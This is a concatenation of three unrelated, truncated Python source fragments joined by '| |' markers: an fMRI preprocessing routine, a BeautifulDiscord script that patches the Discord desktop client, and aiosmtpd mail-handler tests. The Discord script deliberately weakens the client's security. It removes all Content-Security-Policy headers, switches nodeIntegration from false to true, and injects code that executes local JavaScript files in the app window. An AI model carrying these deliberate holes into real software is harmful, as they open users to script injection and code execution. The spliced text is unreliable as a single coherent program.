fmri_data = nim_data.reshape((numspatiallocs, timepoints))[:, validstart : validend + 1]
validtimepoints = validend - validstart + 1
# detect zero mean data
optiondict["dataiszeromean"] = checkforzeromean(fmri_data)
if optiondict["dataiszeromean"]:
LGR.warning(
"WARNING: dataset is zero mean - forcing variance masking and no refine prenormalization. "
"Consider specifying a global mean and correlation mask."
)
optiondict["refineprenorm"] = "None"
optiondict["globalmaskmethod"] = "variance"
# read in the optional masks
tide_util.logmem("before setting masks")
internalglobalmeanincludemask = None
internalglobalmeanexcludemask = None
internalrefineincludemask = None
internalrefineexcludemask = None
if optiondict["globalmeanincludename"] is not None:
LGR.info("constructing global mean include mask")
theglobalmeanincludemask = readamask(
optiondict["globalmeanincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["globalmeanincludevals"],
maskname="global mean include",
)
internalglobalmeanincludemask = theglobalmeanincludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalglobalmeanincludemask) == 0:
raise ValueError(
"ERROR: there are no voxels in the global mean include mask - exiting"
)
if optiondict["globalmeanexcludename"] is not None:
LGR.info("constructing global mean exclude mask")
theglobalmeanexcludemask = readamask(
optiondict["globalmeanexcludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["globalmeanexcludevals"],
maskname="global mean exclude",
)
internalglobalmeanexcludemask = theglobalmeanexcludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalglobalmeanexcludemask) == numspatiallocs:
raise ValueError(
"ERROR: the global mean exclude mask does not leave any voxels - exiting"
)
if (internalglobalmeanincludemask is not None) and (internalglobalmeanexcludemask is not None):
if (
tide_stats.getmasksize(
internalglobalmeanincludemask * (1 - internalglobalmeanexcludemask)
)
== 0
):
raise ValueError(
"ERROR: the global mean include and exclude masks not leave any voxels between them - exiting"
)
if optiondict["refineincludename"] is not None:
LGR.info("constructing refine include mask")
therefineincludemask = readamask(
optiondict["refineincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["refineincludevals"],
maskname="refine include",
)
internalrefineincludemask = therefineincludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalrefineincludemask) == 0:
raise ValueError("ERROR: there are no voxels in the refine include mask - exiting")
if optiondict["refineexcludename"] is not None:
LGR.info("constructing refine exclude mask")
therefineexcludemask = readamask(
optiondict["refineexcludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["refineexcludevals"],
maskname="refine exclude",
)
internalrefineexcludemask = therefineexcludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalrefineexcludemask) == numspatiallocs:
raise ValueError("ERROR: the refine exclude mask does not leave any voxels - exiting")
tide_util.logmem("after setting masks")
# read or make a mask of where to calculate the correlations
tide_util.logmem("before selecting valid voxels")
threshval = tide_stats.getfracvals(fmri_data[:, :], [0.98])[0] / 25.0
LGR.info("constructing correlation mask")
if optiondict["corrmaskincludename"] is not None:
thecorrmask = readamask(
optiondict["corrmaskincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["corrmaskincludevals"],
maskname="correlation",
)
corrmask = np.uint16(np.where(thecorrmask > 0, 1, 0).reshape(numspatiallocs))
else:
# check to see if the data has been demeaned
meanim = np.mean(fmri_data, axis=1)
stdim = np.std(fmri_data, axis=1)
if fileiscifti:
corrmask = np.uint(nim_data[:, 0] * 0 + 1)
else:
if np.mean(stdim) < np.mean(meanim):
LGR.info("generating correlation mask from mean image")
corrmask = np.uint16(masking.compute_epi_mask(nim).dataobj.reshape(numspatiallocs))
else:
LGR.info("generating correlation mask from std image")
corrmask = np.uint16(
tide_stats.makemask(stdim, threshpct=optiondict["corrmaskthreshpct"])
)
if tide_stats.getmasksize(corrmask) == 0:
raise ValueError("ERROR: there are no voxels in the correlation mask - exiting")
optiondict["corrmasksize"] = tide_stats.getmasksize(corrmask)
if internalrefineincludemask is not None:
if internalrefineexcludemask is not None:
if (
tide_stats.getmasksize(
corrmask * internalrefineincludemask * (1 - internalrefineexcludemask)
)
== 0
):
raise ValueError(
"ERROR: the refine include and exclude masks not leave any voxels in the corrmask - exiting"
)
else:
if tide_stats.getmasksize(corrmask * internalrefineincludemask) == 0:
raise ValueError(
"ERROR: the refine include mask does not leave any voxels in the corrmask - exiting"
)
else:
if internalrefineexcludemask is not None:
if tide_stats.getmasksize(corrmask * (1 - internalrefineexcludemask)) == 0:
raise ValueError(
"ERROR: the refine exclude mask does not leave any voxels in the corrmask - exiting"
)
if optiondict["nothresh"]:
corrmask *= 0
corrmask += 1
threshval = -10000000.0
if optiondict["savecorrmask"] and not (fileiscifti or optiondict["textio"]):
theheader = copy.deepcopy(nim_hdr)
theheader["dim"][0] = 3
theheader["dim"][4] = 1
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-processed_mask"
else:
savename = f"{outputname}_corrmask"
tide_io.savetonifti(corrmask.reshape(xsize, ysize, numslices), theheader, savename)
LGR.verbose(f"image threshval = {threshval}")
validvoxels = np.where(corrmask > 0)[0]
numvalidspatiallocs = np.shape(validvoxels)[0]
LGR.info(f"validvoxels shape = {numvalidspatiallocs}")
fmri_data_valid = fmri_data[validvoxels, :] + 0.0
LGR.info(f"original size = {np.shape(fmri_data)}, trimmed size = {np.shape(fmri_data_valid)}")
if internalglobalmeanincludemask is not None:
internalglobalmeanincludemask_valid = 1.0 * internalglobalmeanincludemask[validvoxels]
del internalglobalmeanincludemask
LGR.info(
"internalglobalmeanincludemask_valid has size: "
f"{internalglobalmeanincludemask_valid.size}"
)
else:
internalglobalmeanincludemask_valid = None
if internalglobalmeanexcludemask is not None:
internalglobalmeanexcludemask_valid = 1.0 * internalglobalmeanexcludemask[validvoxels]
del internalglobalmeanexcludemask
LGR.info(
"internalglobalmeanexcludemask_valid has size: "
f"{internalglobalmeanexcludemask_valid.size}"
)
else:
internalglobalmeanexcludemask_valid = None
if internalrefineincludemask is not None:
internalrefineincludemask_valid = 1.0 * internalrefineincludemask[validvoxels]
del internalrefineincludemask
LGR.info(
"internalrefineincludemask_valid has size: " f"{internalrefineincludemask_valid.size}"
)
else:
internalrefineincludemask_valid = None
if internalrefineexcludemask is not None:
internalrefineexcludemask_valid = 1.0 * internalrefineexcludemask[validvoxels]
del internalrefineexcludemask
LGR.info(
"internalrefineexcludemask_valid has size: " f"{internalrefineexcludemask_valid.size}"
)
else:
internalrefineexcludemask_valid = None
tide_util.logmem("after selecting valid voxels")
# move fmri_data_valid into shared memory
if optiondict["sharedmem"]:
LGR.info("moving fmri data to shared memory")
TimingLGR.info("Start moving fmri_data to shared memory")
numpy2shared_func = addmemprofiling(
numpy2shared, optiondict["memprofile"], "before fmri data move"
)
fmri_data_valid = numpy2shared_func(fmri_data_valid, rt_floatset)
TimingLGR.info("End moving fmri_data to shared memory")
# get rid of memory we aren't using
tide_util.logmem("before purging full sized fmri data")
meanvalue = np.mean(
nim_data.reshape((numspatiallocs, timepoints))[:, validstart : validend + 1],
axis=1,
)
del fmri_data
del nim_data
gc.collect()
tide_util.logmem("after purging full sized fmri data")
# filter out motion regressors here
if optiondict["motionfilename"] is not None:
LGR.info("regressing out motion")
TimingLGR.info("Motion filtering start")
(motionregressors, motionregressorlabels, fmri_data_valid,) = tide_glmpass.motionregress(
optiondict["motionfilename"],
fmri_data_valid,
fmritr,
motstart=validstart,
motend=validend + 1,
position=optiondict["mot_pos"],
deriv=optiondict["mot_deriv"],
derivdelayed=optiondict["mot_delayderiv"],
)
TimingLGR.info(
"Motion filtering end",
{
"message2": fmri_data_valid.shape[0],
"message3": "voxels",
},
)
if optiondict["bidsoutput"]:
tide_io.writebidstsv(
f"{outputname}_desc-orthogonalizedmotion_timeseries",
motionregressors,
1.0 / fmritr,
columns=motionregressorlabels,
append=True,
)
else:
tide_io.writenpvecs(motionregressors, f"{outputname}_orthogonalizedmotion.txt")
if optiondict["memprofile"]:
memcheckpoint("...done")
else:
tide_util.logmem("after motion glm filter")
if optiondict["savemotionfiltered"]:
outfmriarray = np.zeros((numspatiallocs, validtimepoints), dtype=rt_floattype)
outfmriarray[validvoxels, :] = fmri_data_valid[:, :]
if optiondict["textio"]:
tide_io.writenpvecs(
outfmriarray.reshape((numspatiallocs, validtimepoints)),
f"{outputname}_motionfiltered.txt",
)
else:
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-motionfiltered"
else:
savename = f"{outputname}_motionfiltered"
tide_io.savetonifti(
outfmriarray.reshape((xsize, ysize, numslices, validtimepoints)),
nim_hdr,
savename,
)
# read in the timecourse to resample
TimingLGR.info("Start of reference prep")
if filename is None:
LGR.info("no regressor file specified - will use the global mean regressor")
optiondict["useglobalref"] = True
else:
optiondict["useglobalref"] = False
# calculate the global mean whether we intend to use it or not
meanfreq = 1.0 / fmritr
meanperiod = 1.0 * fmritr
meanstarttime = 0.0
meanvec, meanmask = getglobalsignal(
fmri_data_valid,
optiondict,
includemask=internalglobalmeanincludemask_valid,
excludemask=internalglobalmeanexcludemask_valid,
pcacomponents=optiondict["globalpcacomponents"],
)
# now set the regressor that we'll use
if optiondict["useglobalref"]:
LGR.info("using global mean as probe regressor")
inputfreq = meanfreq
inputperiod = meanperiod
inputstarttime = meanstarttime
inputvec = meanvec
fullmeanmask = np.zeros(numspatiallocs, dtype=rt_floattype)
fullmeanmask[validvoxels] = meanmask[:]
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-globalmean_mask"
else:
savename = f"{outputname}_meanmask"
if fileiscifti:
theheader = copy.deepcopy(nim_hdr)
timeindex = theheader["dim"][0] - 1
spaceindex = theheader["dim"][0]
theheader["dim"][timeindex] = 1
theheader["dim"][spaceindex] = numspatiallocs
tide_io.savetocifti(
fullmeanmask,
cifti_hdr,
theheader,
savename,
isseries=False,
names=["meanmask"],
)
elif optiondict["textio"]:
tide_io.writenpvecs(
| |
#!/usr/bin/env python
import os
import shutil
import argparse
import textwrap
import subprocess
import psutil
import sys
from beautifuldiscord.asar import Asar
class DiscordProcess:
def __init__(self, path, exe):
self.path = path
self.exe = exe
self.processes = []
def terminate(self):
for process in self.processes:
# terrible
process.kill()
def launch(self):
with open(os.devnull, 'w') as f:
subprocess.Popen([os.path.join(self.path, self.exe)], stdout=f, stderr=subprocess.STDOUT)
@property
def resources_path(self):
if sys.platform == 'darwin':
# OS X has a different resources path
# Application directory is under <[EXE].app/Contents/MacOS/[EXE]>
# where [EXE] is Discord Canary, Discord PTB, etc
# Resources directory is under </Applications/[EXE].app/Contents/Resources/app.asar>
# So we need to fetch the folder based on the executable path.
# Go two directories up and then go to Resources directory.
return os.path.abspath(os.path.join(self.path, '..', 'Resources'))
return os.path.join(self.path, 'resources')
@property
def script_path(self):
if sys.platform == 'win32':
# On Windows:
# path is C:\Users\<UserName>\AppData\Local\<Discord>\app-<version>
# script: C:\Users\<UserName>\AppData\Roaming\<DiscordLower>\<version>\modules\discord_desktop_core
# don't try this at home
path = os.path.split(self.path)
app_version = path[1].replace('app-', '')
discord_version = os.path.basename(path[0])
return os.path.expandvars(os.path.join('%AppData%',
discord_version,
app_version,
r'modules\discord_desktop_core'))
elif sys.platform == 'darwin':
# macOS doesn't encode the app version in the path, but rather it stores it in the Info.plist
# which we can find in the root directory e.g. </Applications/[EXE].app/Contents/Info.plist>
# After we obtain the Info.plist, we parse it for the `CFBundleVersion` key
# The actual path ends up being in ~/Library/Application Support/<DiscordLower>/<version>/modules/...
import plistlib as plist
info = os.path.abspath(os.path.join(self.path, '..', 'Info.plist'))
with open(info, 'rb') as fp:
info = plist.load(fp)
app_version = info['CFBundleVersion']
discord_version = info['CFBundleName'].replace(' ', '').lower()
return os.path.expanduser(os.path.join('~/Library/Application Support',
discord_version,
app_version,
'modules/discord_desktop_core'))
else:
# Discord is available typically on /opt/discord-canary directory
# The modules are under ~/.config/discordcanary/0.0.xx/modules/discord_desktop_core
# To get the version number we have to iterate over ~/.config/discordcanary and find the
# folder with the highest version number
discord_version = os.path.basename(self.path).replace('-', '')
config = os.path.expanduser(os.path.join('~/.config', discord_version))
versions_found = {}
for subdirectory in os.listdir(config):
if not os.path.isdir(os.path.join(config, subdirectory)):
continue
try:
# versions are A.B.C
version_info = tuple(int(x) for x in subdirectory.split('.'))
except Exception as e:
# shucks
continue
else:
versions_found[subdirectory] = version_info
if len(versions_found) == 0:
raise RuntimeError('Could not find discord application version under "{}".'.format(config))
app_version = max(versions_found.items(), key=lambda t: t[1])
return os.path.join(config, app_version[0], 'modules', 'discord_desktop_core')
@property
def script_file(self):
return os.path.join(self.script_path, 'core', 'app', 'mainScreen.js')
def extract_asar():
try:
with Asar.open('./core.asar') as a:
try:
a.extract('./core')
except FileExistsError:
answer = input('asar already extracted, overwrite? (Y/n): ')
if answer.lower().startswith('n'):
print('Exiting.')
return False
shutil.rmtree('./core')
a.extract('./core')
shutil.move('./core.asar', './original_core.asar')
except FileNotFoundError as e:
print('WARNING: app.asar not found')
return True
def repack_asar():
try:
with Asar.from_path('./core') as a:
with open('./core.asar', 'wb') as fp:
a.fp.seek(0)
fp.write(a.fp.read())
shutil.rmtree('./core')
except Exception as e:
print('ERROR: {0.__class__.__name__} {0}'.format(e))
def parse_args():
description = """\
Unpacks Discord and adds CSS/JavaScript hot-reloading.
Discord has to be open for this to work. When this tool is ran,
Discord will close and then be relaunched when the tool completes.
CSS files must have the ".css" extension, and JavaScript files must
have the ".js" extension.
"""
parser = argparse.ArgumentParser(description=description.strip())
parser.add_argument('--css', metavar='file_or_dir', help='Location of the CSS file or directory to watch')
parser.add_argument('--js', metavar='file_or_dir', help='Location of the JavaScript file or directory to watch')
parser.add_argument('--revert', action='store_true', help='Reverts any changes made to Discord (does not delete CSS)')
args = parser.parse_args()
return args
def discord_process():
executables = {}
for proc in psutil.process_iter():
try:
(path, exe) = os.path.split(proc.exe())
except (psutil.Error, OSError):
pass
else:
if exe.startswith('Discord') and not exe.endswith('Helper'):
entry = executables.get(exe)
if entry is None:
entry = executables[exe] = DiscordProcess(path=path, exe=exe)
entry.processes.append(proc)
if len(executables) == 0:
raise RuntimeError('Could not find Discord executable.')
if len(executables) == 1:
r = executables.popitem()
print('Found {0.exe} under {0.path}'.format(r[1]))
return r[1]
lookup = list(executables)
for index, exe in enumerate(lookup):
print('%s: Found %s' % (index, exe))
while True:
index = input("Discord executable to use (number): ")
try:
index = int(index)
except ValueError as e:
print('Invalid index passed')
else:
if index >= len(lookup) or index < 0:
print('Index too big (or small)')
else:
key = lookup[index]
return executables[key]
def revert_changes(discord):
try:
shutil.move('./original_core.asar', './core.asar')
shutil.move('./original_index.js', './index.js')
except FileNotFoundError as e:
print('No changes to revert.')
else:
print('Reverted changes, no more CSS hot-reload :(')
discord.launch()
def remove_csp():
shutil.move('./index.js', './original_index.js')
no_csp_script = textwrap.dedent("""\
require("electron").session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
const responseHeaders = {};
for (let header in details.responseHeaders) {
if (!header.match(/^content-security/i)) {
responseHeaders[header] = details.responseHeaders[header]
}
} callback({
cancel: false,
responseHeaders
});
});
module.exports = require('./core.asar');""")
with open('./index.js', 'w', encoding='utf-8') as f:
f.write(no_csp_script)
def main():
args = parse_args()
try:
discord = discord_process()
except Exception as e:
print(str(e))
return
if args.css:
args.css = os.path.abspath(args.css)
else:
args.css = os.path.join(discord.script_path, 'discord-custom.css')
if args.js:
args.js = os.path.abspath(args.js)
else:
args.js = os.path.join(discord.script_path, 'discord-custom.js')
os.chdir(discord.script_path)
args.css = os.path.abspath(args.css)
args.js = os.path.abspath(args.js)
discord.terminate()
if args.revert:
return revert_changes(discord)
if not os.path.exists(args.css):
with open(args.css, 'w', encoding='utf-8') as f:
f.write('/* put your custom css here. */\n')
if not os.path.exists(args.js):
with open(args.js, 'w', encoding='utf-8') as f:
f.write('// put your custom js here.\n')
if not extract_asar():
discord.launch()
return
injection_script = textwrap.dedent("""\
window._fs = require("fs");
window._path = require("path");
window._fileWatcherCSS = null;
window._fileWatcherJS = null;
window._styleTag = {};
window._scriptTag = {};
window.applyCSS = function(path, name) { window._apply(path, name, "CSS"); };
window.applyJS = function(path, name) { window._apply(path, name, "JS"); };
window._apply = function(path, name, type) {
var elementType = type == "CSS" ? "style" : "script";
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
var customContent = window._fs.readFileSync(path, "utf-8");
if (!tag.hasOwnProperty(name)) {
tag[name] = document.createElement(elementType);
document.head.appendChild(tag[name]);
}
tag[name].innerHTML = customContent;
}
window.clearCSS = function(name) { window._clear(name, "CSS"); };
window.clearJS = function(name) { window._clear(name, "JS"); };
window._clear = function(name) {
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
if (tag.hasOwnProperty(name)) {
tag[name].innerHTML = "";
tag[name].parentElement.removeChild(tag[name]);
delete tag[name];
}
}
window.watchCSS = function(path) { window.watch(path, "CSS"); };
window.watchJS = function(path) { window.watch(path, "JS"); };
window.watch = function(path, type) {
var ext = '.' + type.toLowerCase();
var fnApply = window["apply" + type];
var fnClear = window["clear" + type];
var watcher = window["_fileWatcher" + type];
if (window._fs.lstatSync(path).isDirectory()) {
files = window._fs.readdirSync(path);
dirname = path;
} else {
files = [window._path.basename(path)];
dirname = window._path.dirname(path);
}
for (var i = 0; i < files.length; i++) {
var file = files[i];
if (file.endsWith(ext)) {
fnApply(window._path.join(dirname, file), file)
}
}
if(watcher === null) {
watcher = window._fs.watch(path, { encoding: "utf-8" },
function(eventType, filename) {
if (!filename.endsWith(ext)) return;
path = window._path.join(dirname, filename);
if (eventType === "rename" && !window._fs.existsSync(path)) {
fnClear(filename);
} else {
fnApply(window._path.join(dirname, filename), filename);
}
});
}
};
window.tearDownCSS = function() { window.tearDown("CSS"); };
window.tearDownJS = function() { window.tearDown("JS"); };
window.tearDown = function(type) {
var watcher = window["_fileWatcher" + type];
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
var fnClear = window["clear" + type];
for (var key in tag) {
if (tag.hasOwnProperty(key)) {
fnClear(key);
}
}
if(watcher !== null) { watcher.close(); watcher = null; }
};
window.removeDuplicateCSS = function(){
const styles = [...document.getElementsByTagName("style")];
const styleTags = window._styleTag;
for(let key in styleTags){
for (var i = 0; i < styles.length; i++) {
const keyStyle = styleTags[key];
const curStyle = styles[i];
if(curStyle !== keyStyle) {
const compare = keyStyle.innerText.localeCompare(curStyle.innerText);
if(compare === 0){
const parent = curStyle.parentElement;
parent.removeChild(curStyle);
}
}
}
}
};
window.applyAndWatchCSS = function(path) { window.applyAndWatch(path, "CSS"); };
window.applyAndWatchJS = function(path) { window.applyAndWatch(path, "JS"); };
window.applyAndWatch = function(path, type) {
window.tearDown(type);
window.watch(path, type);
};
window.applyAndWatchCSS('%s');
window.applyAndWatchJS('%s');
window.removeDuplicateCSS();
""" % (args.css.replace('\\', '\\\\'), args.js.replace('\\', '\\\\')))
injection_path = os.path.expanduser(os.path.join('~', '.beautifuldiscord'))
if not os.path.exists(injection_path):
os.mkdir(injection_path)
injection_file = os.path.abspath(os.path.join(injection_path, 'injection.js'))
with open(injection_file, 'w', encoding='utf-8') as f:
f.write(injection_script)
reload_script = textwrap.dedent("""\
mainWindow.webContents.on('dom-ready', function () {
var _fs = require('fs');
mainWindow.webContents.executeJavaScript(
_fs.readFileSync('%s', 'utf-8')
);
});
""" % injection_file.replace('\\', '\\\\'))
with open(discord.script_file, 'rb') as f:
entire_thing = f.read()
index = entire_thing.index(b"mainWindow.on('blur'")
if index == -1:
# failed replace for some reason?
print('warning: nothing was done.\n' \
'note: blur event was not found for the injection point.')
revert_changes(discord)
discord.launch()
return
# yikes
to_write = entire_thing[:index] + reload_script.encode('utf-8') + entire_thing[index:]
to_write = to_write.replace(b'nodeIntegration: false', b'nodeIntegration: true', 1)
with open(discord.script_file, 'wb') as f:
f.write(to_write)
# repack the asar so discord stops complaining
repack_asar()
# finally, remove csp by injecting into index.js
remove_csp()
print(
'\nDone!\n' +
'\nYou may now edit | |
import os
import sys
import unittest
from aiosmtpd.controller import Controller
from aiosmtpd.handlers import AsyncMessage, Debugging, Mailbox, Proxy, Sink
from aiosmtpd.smtp import SMTP as Server
from contextlib import ExitStack
from io import StringIO
from mailbox import Maildir
from operator import itemgetter
from smtplib import SMTP, SMTPDataError, SMTPRecipientsRefused
from tempfile import TemporaryDirectory
from unittest.mock import call, patch
CRLF = '\r\n'
class DecodingController(Controller):
def factory(self):
return Server(self.handler, decode_data=True)
class AUTHDecodingController(Controller):
def factory(self):
return Server(self.handler, decode_data=True, auth_require_tls=False)
class DataHandler:
def __init__(self):
self.content = None
self.original_content = None
async def handle_DATA(self, server, session, envelope):
self.content = envelope.content
self.original_content = envelope.original_content
return '250 OK'
class TestDebugging(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging(self):
with ExitStack() as resources:
client = resources.enter_context(SMTP(*self.address))
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestDebuggingBytes(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging(self):
with ExitStack() as resources:
client = resources.enter_context(SMTP(*self.address))
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestDebuggingOptions(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging_without_options(self):
with SMTP(*self.address) as client:
# Prevent ESMTP options.
client.helo()
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
def test_debugging_with_options(self):
with SMTP(*self.address) as client:
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""", mail_options=['BODY=7BIT'])
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102', 'BODY=7BIT']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestMessage(unittest.TestCase):
def test_message(self):
# In this test, the message content comes in as a bytes.
handler = DataHandler()
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
# The content is not converted, so it's bytes.
self.assertEqual(handler.content, handler.original_content)
self.assertIsInstance(handler.content, bytes)
self.assertIsInstance(handler.original_content, bytes)
def test_message_decoded(self):
# In this test, the message content comes in as a string.
handler = DataHandler()
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertNotEqual(handler.content, handler.original_content)
self.assertIsInstance(handler.content, str)
self.assertIsInstance(handler.original_content, bytes)
class TestAsyncMessage(unittest.TestCase):
def setUp(self):
self.handled_message = None
class MessageHandler(AsyncMessage):
async def handle_message(handler_self, message):
self.handled_message = message
self.handler = MessageHandler()
def test_message(self):
# In this test, the message data comes in as bytes.
controller = Controller(self.handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertEqual(self.handled_message['subject'], 'A test')
self.assertEqual(self.handled_message['message-id'], '<ant>')
self.assertIsNotNone(self.handled_message['X-Peer'])
self.assertEqual(
self.handled_message['X-MailFrom'], '<EMAIL>')
self.assertEqual(self.handled_message['X-RcptTo'], '<EMAIL>')
def test_message_decoded(self):
# With a server that decodes the data, the messages come in as
# strings. There's no difference in the message seen by the
# handler's handle_message() method, but internally this gives full
# coverage.
controller = DecodingController(self.handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertEqual(self.handled_message['subject'], 'A test')
self.assertEqual(self.handled_message['message-id'], '<ant>')
self.assertIsNotNone(self.handled_message['X-Peer'])
self.assertEqual(
self.handled_message['X-MailFrom'], '<EMAIL>')
self.assertEqual(self.handled_message['X-RcptTo'], '<EMAIL>')
class TestMailbox(unittest.TestCase):
def setUp(self):
self.tempdir = TemporaryDirectory()
self.addCleanup(self.tempdir.cleanup)
self.maildir_path = os.path.join(self.tempdir.name, 'maildir')
self.handler = handler = Mailbox(self.maildir_path)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_mailbox(self):
with SMTP(*self.address) as client:
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Hi Bart, this is Anne.
""")
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <bee>
Hi Dave, this is Cate.
""")
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <cat>
Hi Fred, this is Elle.
""")
# Check the messages in the mailbox.
mailbox = Maildir(self.maildir_path)
messages = sorted(mailbox, key=itemgetter('message-id'))
self.assertEqual(
list(message['message-id'] for message in messages),
['<ant>', '<bee>', '<cat>'])
def test_mailbox_reset(self):
with SMTP(*self.address) as client:
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Hi Bart, this is Anne.
""")
self.handler.reset()
mailbox = Maildir(self.maildir_path)
self.assertEqual(list(mailbox), [])
class FakeParser:
def __init__(self):
self.message = None
def error(self, message):
self.message = message
raise SystemExit
class TestCLI(unittest.TestCase):
def setUp(self):
self.parser = FakeParser()
def test_debugging_cli_no_args(self):
handler = Debugging.from_cli(self.parser)
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stdout)
def test_debugging_cli_two_args(self):
self.assertRaises(
SystemExit,
Debugging.from_cli, self.parser, 'foo', 'bar')
self.assertEqual(
self.parser.message, 'Debugging usage: [stdout|stderr]')
def test_debugging_cli_stdout(self):
handler = Debugging.from_cli(self.parser, 'stdout')
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stdout)
def test_debugging_cli_stderr(self):
handler = Debugging.from_cli(self.parser, 'stderr')
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stderr)
def test_debugging_cli_bad_argument(self):
self.assertRaises(
SystemExit,
Debugging.from_cli, self.parser, 'stdfoo')
self.assertEqual(
self.parser.message, 'Debugging usage: [stdout|stderr]')
def test_sink_cli_no_args(self):
handler = Sink.from_cli(self.parser)
self.assertIsNone(self.parser.message)
self.assertIsInstance(handler, Sink)
def test_sink_cli_any_args(self):
self.assertRaises(
SystemExit,
Sink.from_cli, self.parser, 'foo')
self.assertEqual(
self.parser.message, 'Sink handler does not accept arguments')
def test_mailbox_cli_no_args(self):
self.assertRaises(SystemExit, Mailbox.from_cli, self.parser)
self.assertEqual(
self.parser.message,
'The directory for the maildir is required')
def test_mailbox_cli_too_many_args(self):
self.assertRaises(SystemExit, Mailbox.from_cli, self.parser,
'foo', 'bar', 'baz')
self.assertEqual(
self.parser.message,
'Too many arguments for Mailbox handler')
def test_mailbox_cli(self):
with TemporaryDirectory() as tmpdir:
handler = Mailbox.from_cli(self.parser, tmpdir)
self.assertIsInstance(handler.mailbox, Maildir)
self.assertEqual(handler.mail_dir, tmpdir)
class TestProxy(unittest.TestCase):
def setUp(self):
# There are two controllers and two SMTPd's running here. The
# "upstream" one listens on port 9025 and is connected to a "data
# handler" which captures the messages it receives. The second -and
# the one under test here- listens on port 9024 and proxies to the one
# on port 9025. Because we need to set the decode_data flag
